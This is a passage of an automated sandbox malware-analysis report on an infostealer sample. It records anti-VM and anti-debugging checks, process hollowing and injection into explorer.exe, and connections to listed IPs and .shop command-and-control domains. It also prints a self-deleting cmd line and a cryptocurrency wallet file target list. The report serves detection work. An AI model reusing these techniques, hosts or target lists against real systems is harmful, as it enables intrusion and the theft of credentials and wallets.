Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR
Source: C:\Users\user\Desktop\3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rcjjrra Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\A247.exe System information queried: FirmwareTableInformation
Source: rcjjrra, 00000004.00000002.2319460802.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_008B2CD7 rdtsc 5_2_008B2CD7
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 384
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2725
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 872
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 355
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1956
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 889
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 851
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll
Source: C:\Windows\explorer.exe TID: 6044 Thread sleep count: 384 > 30
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep count: 2725 > 30
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep time: -272500s >= -30000s
Source: C:\Windows\explorer.exe TID: 5704 Thread sleep count: 872 > 30
Source: C:\Windows\explorer.exe TID: 5704 Thread sleep time: -87200s >= -30000s
Source: C:\Windows\explorer.exe TID: 320 Thread sleep count: 216 > 30
Source: C:\Windows\explorer.exe TID: 6768 Thread sleep count: 355 > 30
Source: C:\Windows\explorer.exe TID: 6768 Thread sleep time: -35500s >= -30000s
Source: C:\Windows\explorer.exe TID: 1848 Thread sleep count: 345 > 30
Source: C:\Windows\explorer.exe TID: 1848 Thread sleep time: -34500s >= -30000s
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep count: 1956 > 30
Source: C:\Windows\explorer.exe TID: 6804 Thread sleep time: -195600s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A247.exe TID: 5548 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A247.exe TID: 5548 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 768 Thread sleep count: 54 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 9_2_6CC9EBF0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: BFBGHD.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: A247.exe, 00000005.00000003.2411290273.0000000002E55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: BFBGHD.9.dr Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2871925819.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BFBGHD.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: BFBGHD.9.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: BFBGHD.9.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: kat2225.tmp, 00000009.00000002.3185736786.0000000005120000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareta=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: BFBGHD.9.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BFBGHD.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: A247.exe, 00000005.00000003.2411290273.0000000002E55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: kat2225.tmp, 00000009.00000002.3185736786.0000000005120000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: BFBGHD.9.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2036556348.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BFBGHD.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000073E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHHz%SystemRoot%\system32\mswsock.dll+
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: BFBGHD.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: BFBGHD.9.dr Binary or memory string: discord.comVMware20,11696428655f
Source: BFBGHD.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BFBGHD.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BFBGHD.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BFBGHD.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BFBGHD.9.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BFBGHD.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: BFBGHD.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BFBGHD.9.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BFBGHD.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BFBGHD.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BFBGHD.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: BFBGHD.9.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BFBGHD.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: BFBGHD.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\3.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\3.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\3.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\rcjjrra System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\rcjjrra Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_008B2CD7 rdtsc 5_2_008B2CD7
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00402A9F LdrLoadDll, 0_2_00402A9F
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_6CD6AC62
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D51EF6 push dword ptr fs:[00000030h] 0_2_02D51EF6
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02E40D90 mov eax, dword ptr fs:[00000030h] 0_2_02E40D90
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02E4092B mov eax, dword ptr fs:[00000030h] 0_2_02E4092B
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02E20D90 mov eax, dword ptr fs:[00000030h] 4_2_02E20D90
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02E2092B mov eax, dword ptr fs:[00000030h] 4_2_02E2092B
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB0FD6 push dword ptr fs:[00000030h] 4_2_02EB0FD6
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0061092B mov eax, dword ptr fs:[00000030h] 5_2_0061092B
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00610D90 mov eax, dword ptr fs:[00000030h] 5_2_00610D90
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_008ADA5B push dword ptr fs:[00000030h] 5_2_008ADA5B

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: 5358.exe.2.dr
Source: C:\Windows\explorer.exe Network Connect: 190.187.52.42 80
Source: C:\Windows\explorer.exe Network Connect: 88.225.215.104 80
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
Source: Yara match File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory allocated: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 8_2_043BA4F0
Source: C:\Users\user\Desktop\3.exe Thread created: C:\Windows\explorer.exe EIP: 33519E0
Source: C:\Users\user\AppData\Roaming\rcjjrra Thread created: unknown EIP: 32019E0
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000 value starts with: 4D5A
Source: A247.exe String found in binary or memory: zippyfinickysofwps.shop
Source: A247.exe String found in binary or memory: obsceneclassyjuwks.shop
Source: A247.exe String found in binary or memory: acceptabledcooeprs.shop
Source: A247.exe String found in binary or memory: whispedwoodmoodsksl.shop
Source: A247.exe String found in binary or memory: boredimperissvieos.shop
Source: A247.exe String found in binary or memory: holicisticscrarws.shop
Source: A247.exe String found in binary or memory: sweetsquarediaslw.shop
Source: A247.exe String found in binary or memory: plaintediousidowsko.shop
Source: A247.exe String found in binary or memory: miniaturefinerninewjs.shop
Source: C:\Users\user\Desktop\3.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\3.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section unmapped: C:\Users\user\AppData\Local\Temp\kat2225.tmp base address: 400000
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 401000
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 422000
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 42E000
Source: C:\Users\user\AppData\Local\Temp\5358.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 641000
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CDB4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 9_2_6CDB4760
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2036443030.0000000004B00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2035435817.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6AE71 cpuid 9_2_6CD6AE71
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 9_2_6CD6A8DC
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB8390 NSS_GetVersion, 9_2_6CCB8390
Source: C:\Users\user\AppData\Local\Temp\A247.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: A247.exe, 00000005.00000002.2872781231.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2723791713.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2688986556.000000000096F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\A247.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
